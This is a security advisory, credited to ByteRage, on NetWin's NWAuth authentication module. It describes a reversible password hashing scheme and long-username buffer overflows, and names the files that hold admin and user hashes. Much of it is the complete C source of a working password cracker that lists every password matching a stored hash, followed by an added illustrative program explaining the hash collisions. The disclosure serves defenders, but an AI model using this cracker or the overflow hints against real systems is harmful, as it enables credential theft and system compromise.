NetWin's NetAuth, a web-based email management system for users, domain administrators, and system administrators, contains multiple security vulnerabilities.
These security holes allow an attacker to decrypt the passwords and to execute arbitrary code.
Credit:
The information has been provided by ByteRage.
Vulnerable systems:
NetWin version 3.0b
NetWin version 2.0
Password storage vulnerability:
The 'NetWin Authentication module' that is used by SurgeFTP, DMail and other programs uses quite an unusual hashing algorithm to store the password hashes. Because of the complexity of the hashing algorithm, the users of NWAuth may not be aware of it, but the algorithm is flawed in (at least) two ways:
1) The password hashes can be decrypted.
2) One hash can match more than one password.
Fortunately, SurgeFTP has implemented anti-hammering techniques to prevent password brute forcing.
The password hashes used by SurgeFTP can be found within the files: \surgeftp\admin.dat (sysadmin password) & \surgeftp\nwauth.clg (user passwords)
Buffer overflow vulnerabilities:
NWAuth also contains many buffer overflows throughout the source code (especially older versions, for example, 2.0) that might lead to a root/administrator compromise of the system due to execution of arbitrary code. Here are some examples:
1) The nwauth -del command causes an access violation when supplied with a very long username. This might not be a big deal, since only administrators are supposed to delete users.
2) The nwauth -lookup command causes an access violation when supplied with a username of about 1000 characters. This might be triggered by an attacker if the program were to pass this username from a "USER" command.
Exploit code: (Password cracker)
/********************************************************************
* nwauthcrack.c - NetWin Authentication Module password cracker *
* the SurgeFTP encrypted passwords can be found in the admin.dat & *
* nwauth.clg files in the nwauth.exe directory *
* by [ByteRage] <byterage@yahoo.com> [http://www.byterage.cjb.net] *
********************************************************************/
#include <string.h>
#include <stdio.h>
FILE *fh;
/* the following table indices refer to the characters our
generated password may consist of (true/false), since
we don't want to go into too much trouble when typing
everything in :) */
const char okaychars[256] = {
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,
0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,
1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,
0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,
1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
};
/* DECRYPTION ALGORITHMS */
int enumpwds(unsigned char encrypted[]) {
int heavycrypt0;
unsigned int num=0, i, x;
unsigned char j[256], decrypted[256];
for(i=0; i<256;i++) { j[i] = 0; }
brute:
heavycrypt0 = (unsigned char)encrypted[1]*255+(unsigned char)encrypted[0];
for(i=0; i+2 < strlen((const char *)encrypted); i++) {
for(x=j[i]; x < 256; x++) {
if ((x * (heavycrypt0+1) % 40 == (encrypted[i+2]-0x41)) & okaychars[x]) {
decrypted[i] = x;
break;
}
}
if (x == 256) {
next:
if (i == 0) return num;
if (j[i-1] < 256) { j[i-1] = decrypted[i-1]+1; x = i; } else { i--; goto next; }
for (i=x; i < 256; i++) { j[i] = 0; }
goto brute;
}
heavycrypt0 += x; heavycrypt0 *= 3; heavycrypt0 %= 0x7D00;
}
decrypted[i] = '\x00';
num++;
printf("%s\n", decrypted);
if (j[i-1] < 256) { j[i-1] = decrypted[i-1]+1; x = i; } else { i--; goto next; }
for (i=x; i < 256; i++) { j[i] = 0; }
goto brute;
}
/* DECRYPTION ALGORITHMS END */
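int main(int argc, char ** argv) {
size_t len;
printf("NetWin Authentication Module password cracker by [ByteRage]\n\n");
if (argc < 2) { printf("Syntax : %s <password>\n", argv[0]); return 1; }
/* enumpwds() reads two leading bytes plus at least one encoded byte and
writes into 256-byte buffers, so reject input outside that range */
len = strlen(argv[1]);
if (len < 3 || len > 257) { printf("Input must be 3 to 257 characters long\n"); return 1; }
printf("%s ->\n",argv[1]);
printf("\n%d passwords found for %s\n",enumpwds((unsigned char *)argv[1]),argv[1]);
return 0;
}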
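
Why one hash can match more than one password, as an added example (not part of ByteRage's code or of NWAuth): the comparison in the cracker above implies that each stored symbol is (character * (state + 1)) % 40, so the 62 alphanumeric characters cannot map to distinct symbols. The function names and the sample multipliers are constructed for illustration.

```c
/* Added illustration, not part of nwauthcrack.c or NWAuth itself.
 * Assumption (inferred from the cracker's test on the page): each stored
 * symbol equals (c * (state + 1)) % 40 for password character c. */
#include <ctype.h>
#include <stdio.h>

#define SYMBOLS 40   /* modulus used in the cracker's comparison */

/* Fill counts[r] with how many alphanumeric characters encode to symbol r
 * under the given multiplier (state + 1). Returns the largest count. */
int preimage_counts(unsigned int multiplier, int counts[SYMBOLS]) {
    int c, r, max = 0;
    for (r = 0; r < SYMBOLS; r++) counts[r] = 0;
    for (c = 0; c < 128; c++) {
        if (!isalnum(c)) continue;          /* same set as okaychars[] */
        r = (int)((c * multiplier) % SYMBOLS);
        if (++counts[r] > max) max = counts[r];
    }
    return max;
}

/* Number of distinct symbols that can appear at all for this multiplier. */
int reachable_symbols(unsigned int multiplier) {
    int counts[SYMBOLS], r, n = 0;
    preimage_counts(multiplier, counts);
    for (r = 0; r < SYMBOLS; r++) if (counts[r]) n++;
    return n;
}

int main(void) {
    /* Constructed multipliers: coprime to 40, sharing a factor, multiple of 40. */
    unsigned int samples[] = { 1, 7, 20, 40 };
    int counts[SYMBOLS];
    size_t i;
    for (i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        int max = preimage_counts(samples[i], counts);
        printf("multiplier %2u: %2d reachable symbols, up to %2d characters per symbol\n",
               samples[i], reachable_symbols(samples[i]), max);
    }
    return 0;
}
```

Even in the best case (multiplier coprime to 40) some symbols have two candidate characters, and when the multiplier is a multiple of 40 every character encodes to the same symbol, so that position of the hash carries no information about the password.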